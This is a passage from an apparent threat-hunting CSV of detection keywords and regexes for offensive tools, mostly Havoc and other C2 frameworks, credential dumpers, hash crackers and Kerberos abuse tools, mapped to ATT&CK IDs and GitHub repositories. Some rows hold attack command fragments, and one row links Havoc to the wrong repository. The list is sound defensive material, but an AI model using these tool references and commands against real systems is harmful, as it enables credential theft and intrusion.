ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Hangingsword/HouQing*",".{0,1000}Hangingsword\/HouQing.{0,1000}","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" "*HardHatC2*",".{0,1000}HardHatC2.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*hardhatc2.com*",".{0,1000}hardhatc2\.com.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*HardHatC2Client*",".{0,1000}HardHatC2Client.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*HarmJ0y/DAMP*",".{0,1000}HarmJ0y\/DAMP.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*HarvestBrowserPasswords.exe*",".{0,1000}HarvestBrowserPasswords\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*HarvestBrowserPasswords.pdb*",".{0,1000}HarvestBrowserPasswords\.pdb.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*harvestcrop.exe * *",".{0,1000}harvestcrop\.exe\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*has no pre auth required. Dumping hash to crack offline:*",".{0,1000}has\sno\spre\sauth\srequired\.\sDumping\shash\sto\scrack\soffline\:.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*HasAutoAdminLogonCredentials*",".{0,1000}HasAutoAdminLogonCredentials.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*hash3liZer/SillyRAT*",".{0,1000}hash3liZer\/SillyRAT.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","7","670","152","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z" "*hash3liZer/wifijammer*",".{0,1000}hash3liZer\/wifijammer.{0,1000}","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1499","TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hash3liZer/wifijammer","1","1","N/A","N/A","2","188","43","2021-06-10T12:33:49Z","2018-01-20T16:26:45Z" "*Hash-Buster*",".{0,1000}Hash\-Buster.{0,1000}","offensive_tool_keyword","Hash-Buster","hash cracking tool ","T1201 - T1110 - T1021","TA0001 - TA0002 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/s0md3v/Hash-Buster","1","1","N/A","N/A","10","1654","383","2023-04-11T09:43:06Z","2017-07-03T17:28:51Z" "*hashcat*",".{0,1000}hashcat.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","19908","2745","2024-04-20T17:36:13Z","2015-12-04T14:46:51Z" "*hashcat-*.7z*",".{0,1000}hashcat\-.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","19908","2745","2024-04-20T17:36:13Z","2015-12-04T14:46:51Z" "*hashcat.git*",".{0,1000}hashcat\.git.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","19908","2745","2024-04-20T17:36:13Z","2015-12-04T14:46:51Z" "*hashcat/hashcat*",".{0,1000}hashcat\/hashcat.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","19908","2745","2024-04-20T17:36:13Z","2015-12-04T14:46:51Z" "*hashcat-rule-master*",".{0,1000}hashcat\-rule\-master.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*hashdump.py*",".{0,1000}hashdump\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*hashdump.rb*",".{0,1000}hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*hashdump.x64.dll*",".{0,1000}hashdump\.x64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*hashdump_sam*",".{0,1000}hashdump_sam.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*HashDumpDCImplant*",".{0,1000}HashDumpDCImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*HashDumpSAMImplant*",".{0,1000}HashDumpSAMImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*hashedBootKey CheckSum failed, Syskey startup password probably in use! :(*",".{0,1000}hashedBootKey\sCheckSum\sfailed,\sSyskey\sstartup\spassword\sprobably\sin\suse!\s\:\(.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*hasherezade/exe_to_dll*",".{0,1000}hasherezade\/exe_to_dll.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*hasherezade/exe_to_dll*",".{0,1000}hasherezade\/exe_to_dll.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*hasherezade/persistence_demos*",".{0,1000}hasherezade\/persistence_demos.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","1","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*-hashes* --escalate-user*",".{0,1000}\-hashes.{0,1000}\s\-\-escalate\-user.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*hashonymize --ntds * --kerberoast *",".{0,1000}hashonymize\s\-\-ntds\s.{0,1000}\s\-\-kerberoast\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*HashPals/Name-That-Hash*",".{0,1000}HashPals\/Name\-That\-Hash.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*--hash-type 1000 --potfile-path*.ntds.cracked*",".{0,1000}\-\-hash\-type\s1000\s\-\-potfile\-path.{0,1000}\.ntds\.cracked.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hashview*@*localhost*",".{0,1000}hashview.{0,1000}\@.{0,1000}localhost.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*hashview/config.conf*",".{0,1000}hashview\/config\.conf.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*hashview/hashview*",".{0,1000}hashview\/hashview.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*hashview-agent.*.tgz*",".{0,1000}hashview\-agent\..{0,1000}\.tgz.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*hashview-agent.py*",".{0,1000}hashview\-agent\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*HasSPNNoPreauth*",".{0,1000}HasSPNNoPreauth.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*hatlord/snmpwn*",".{0,1000}hatlord\/snmpwn.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","236","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*havoc client*",".{0,1000}havoc\sclient.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*havoc server*",".{0,1000}havoc\sserver.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc.agent*",".{0,1000}havoc\.agent.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc.git*",".{0,1000}Havoc\.git.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc.hpp*",".{0,1000}Havoc\.hpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc.service*",".{0,1000}havoc\.service.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc.yaotl*",".{0,1000}havoc\.yaotl.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc/Client*",".{0,1000}Havoc\/Client.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc/cmd/*",".{0,1000}Havoc\/cmd\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc/payloads*",".{0,1000}Havoc\/payloads.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc/pkg*",".{0,1000}Havoc\/pkg.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc/Teamserver*",".{0,1000}Havoc\/Teamserver.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc_agent.py*",".{0,1000}havoc_agent\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc_agent_talon.*",".{0,1000}havoc_agent_talon\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc_default.yaotl*",".{0,1000}havoc_default\.yaotl.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc_externalc2*",".{0,1000}havoc_externalc2.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc_service_connect*",".{0,1000}havoc_service_connect.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc-c2-client*",".{0,1000}havoc\-c2\-client.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc-c2-data*",".{0,1000}havoc\-c2\-data.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havocframework.com*",".{0,1000}havocframework\.com.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*HavocService*",".{0,1000}HavocService.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - 